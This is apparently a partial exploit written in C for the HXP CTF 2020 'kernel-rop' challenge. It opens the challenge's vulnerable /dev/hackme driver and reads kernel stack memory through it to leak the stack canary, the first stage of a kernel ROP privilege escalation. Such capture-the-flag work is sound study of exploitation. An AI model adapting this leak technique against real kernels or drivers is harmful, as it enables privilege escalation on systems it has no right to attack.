HXP CTF 2020 >> kernel-rop | partial exploit
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Character device exposed by the vulnerable kernel module. */
char *VULN_DRV = "/dev/hackme";
/* Index (in 8-byte words) into the leaked buffer where leak_cookie()
 * expects the stack canary to sit. */
uint8_t cookie_off = 16;
/* Leaked canary value; stays zero until leak_cookie() succeeds. */
uint64_t cookie = 0;
/* Descriptor for VULN_DRV, filled in by open_dev(). */
int64_t global_fd = 0;
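/* Open the vulnerable device read/write and store the descriptor in
 * global_fd.  On failure the reason is printed and the process exits with
 * -1; on success a banner is printed and control returns to the caller. */
void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        /* Report errno so a missing module (ENOENT) is distinguishable from
         * a permissions problem (EACCES) when run on the target. */
        printf("[-] failed to open %s: %s\n", VULN_DRV, strerror(errno));
        exit(-1);
    }
    printf("[+] successfully opened %s\n", VULN_DRV);
}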
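/* Read a chunk of kernel stack through the driver and pull the stack
 * canary out of it at word index cookie_off, storing it in `cookie`.
 *
 * Exits with -1 if the read fails, if the driver returned fewer bytes than
 * needed to reach cookie_off, or if the value found there is zero.  The
 * original version ignored the read() result and indexed an uninitialised
 * buffer, so a short or failed read could be reported as a "found" canary. */
void leak_cookie() {
    /* Number of 8-byte words requested; cookie_off must lie below this. */
    enum { LEAK_QWORDS = 40 };
    /* Zero-filled so stale stack contents can never masquerade as a leak. */
    uint64_t leak[LEAK_QWORDS] = {0};

    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));

    /* read() returns ssize_t; keeping it signed is what makes -1 visible. */
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        printf("[-] read from device failed: %s\n", strerror(errno));
        exit(-1);
    }

    /* Only trust leak[cookie_off] if the driver actually wrote that far. */
    size_t needed = ((size_t)cookie_off + 1) * sizeof(leak[0]);
    if ((size_t)n < needed) {
        printf("[-] short read: got %zd bytes, need %zu to reach index %u\n",
               n, needed, (unsigned)cookie_off);
        exit(-1);
    }

    cookie = leak[cookie_off];
    if (!cookie) {
        puts("[-] failed to leak stack canary!");
        exit(-1);
    }
    /* NOTE(review): on x86_64 the kernel conventionally keeps the low byte
     * of the canary zero; if that holds for this target, (cookie & 0xff) == 0
     * would be a cheap extra sanity check.  Left out until confirmed. */
    printf("[+] found stack canary: 0x%" PRIx64 " @ index %u\n",
           cookie, (unsigned)cookie_off);
}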
/* Entry point: open the vulnerable device, then leak the stack canary.
 * Both helpers exit(-1) themselves on failure, so reaching the return
 * statement means `cookie` holds the leaked value.  Command-line arguments
 * are not used. */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    open_dev();
    leak_cookie();

    return EXIT_SUCCESS;
}